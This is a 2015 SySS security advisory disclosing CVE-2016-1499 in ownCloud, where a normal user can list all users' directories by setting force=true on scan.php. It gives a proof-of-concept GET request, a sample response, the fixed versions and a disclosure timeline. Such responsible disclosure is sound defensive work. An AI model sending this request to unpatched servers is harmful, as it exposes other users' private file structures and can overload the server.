ownCloud 8.2.1 / 8.1.4 / 8.0.9 Information Exposure

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2015-062  
Product: ownCloud  
Manufacturer: ownCloud Inc., Community  
Affected Version(s): ownCloud <= 8.2.1, <= 8.1.4, <= 8.0.9  
Tested Version(s): 8.1.1, 8.1.4  
Vulnerability Type: Information Exposure Through Directory Listing (CWE-548)  
Risk Level: Medium  
Solution Status: Fixed  
Manufacturer Notification: 2015-07-17  
Solution Date: 2015-12-23  
Public Disclosure: 2016-01-06  
CVE Reference: CVE-2016-1499  
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
ownCloud is a software suite for creating and using file hosting  
services.  
  
The ownCloud Web site describes the software as follows (see [1]):  
  
"ownCloud is a self-hosted file sync and share server. It provides access   
to your data through a web interface, sync clients or WebDAV while   
providing a platform to view, sync and share across devices easily — all   
under your control. ownCloud’s open architecture is extensible via a   
simple but powerful API for applications and plugins and it works with   
any storage."  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
ownCloud is vulnerable to information exposure through directory  
listing. It is possible with a normal user to get information about  
the complete directory structure and included files of all users.  
The 'force' parameter in the script (index.php/apps/files/ajax/scan.php)  
can easily be manipulated, by setting its value to 'true'.  
  
This vulnerability can potentially be used for denial-of-service attacks  
if the selected directory is deep enough, because to index many  
directories requires high computational effort. In addition, sensitive  
information from other users is exposed.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
With the following HTTP GET request, it is possible to see the  
directories of other users.  
  
  
GET /index.php/apps/files/ajax/scan.php?force=true&dir=&requesttoken=<VALIDREQUESTTOKEN> HTTP/1.1  
Host: [HOST]  
Accept: text/event-stream  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: [REFERER]  
Cookie: [COOKIES]  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
  
Server response (shortened):  
  
event: user  
data: "[ID]"  
  
event: folder  
data: "\/"  
  
event: count  
data: 21  
  
event: count  
data: 42  
  
event: count  
data: 63  
  
event: folder  
data: "\/[ID]"  
  
event: folder  
data: "\/[ID]\/cache"  
  
event: folder  
data: "\/[ID]6\/files"  
  
event: folder  
data: "\/[ID]\/files_encryption"  
  
[...]  
  
event: folder  
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].zip"  
  
event: folder  
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].zip\/OC_DEFAULT_MODULE"  
  
event: folder  
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].pptx"  
  
[...]  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
According to information by ownCloud, the described security issue has  
been fixed in software releases:  
– ownCloud 8.2.2  
– ownCloud 8.1.5  
– ownCloud 8.0.10  
  
Please contact the manufacturer for further information or support or   
visit https://owncloud.org/security/advisory/?id=oc-sa-2016-002.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2015-11-17: Vulnerability reported to manufacturer  
2015-12-23: Patch published by manufacturer  
2016-01-06: Public release of security advisory  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] ownCloud, Web Site  
https://owncloud.org/  
[2] SySS Security Advisory SYSS-2015-062  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-062.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/news/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Dr. Erlijn van Genuchten of the  
SySS GmbH.  
  
E-Mail: [email protected]  
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc  
Key ID: 0xBD96FF2A  
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is" and   
without warranty of any kind. Details of this security advisory may be updated   
in order to provide as accurate information as possible. The latest version of   
this security advisory is available on the SySS Web site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQIcBAEBCgAGBQJWjiHkAAoJEAylhje9lv8qzJYP/jCxIJ64SWR8lKEvZxEQDSbr  
L0XBUOBCtl1K0BQnTVXrSOq5lph8VPfJGdxkC35QWDX9zt1mGJxDqvRuC8ugG5ZU  
SqnAimeXWOCeNuZOFWjiynKntxbmqSVfSKws2ZwvR7TYWz8t5n2igflfeIgeHtie  
Z5lMPWTAzrU6qcDP1zJBG4hnVIuDorDqsMvuDFY0SSzZgBf+nJ5ovE8P6kvnYs90  
eEtZ91oZaGICfGuSaLYu0/GOQ34Ww2v9/9CQyBVukaySJX51d02putfqfnYxZPSx  
TrkWPwc9BUGZF0VK+1qwgP0+hr67yz7+ypCQ6KdmHz6chPIlyVk/fAo9X/weuTlA  
H2n78Pb1ICHRlsSa8gyVFOJeTTqsmF9AAIWeT5TrcXHlNK2FY46Vl21jxFtNtjeN  
wdTfzVGvwJjIDkq6iikg4/yaz3xduCilfJd8vKf1MNki/4Lw1oT+5KGuHJQPAPTD  
3nvN+gU4qJxRt2YPaXEvIavpFszkG0GCqZJ5BX7B4b8zW15fl+E5W/ewp95J9FWS  
x+s4Vn/7uvrtOpNAcUq0HPLbG5OtgM4DyHceZoQlz1g5fsh8gbrSM7ZKQjKTS3Vb  
+MGCAXdwTNwa/cka5WKT16/2959uwTRZO8jQloINfWOwUyweC+JIYPZ2OQsmxLop  
ceqeLBdlztCJvqeu5rJY  
=tGfZ  
-----END PGP SIGNATURE-----  
`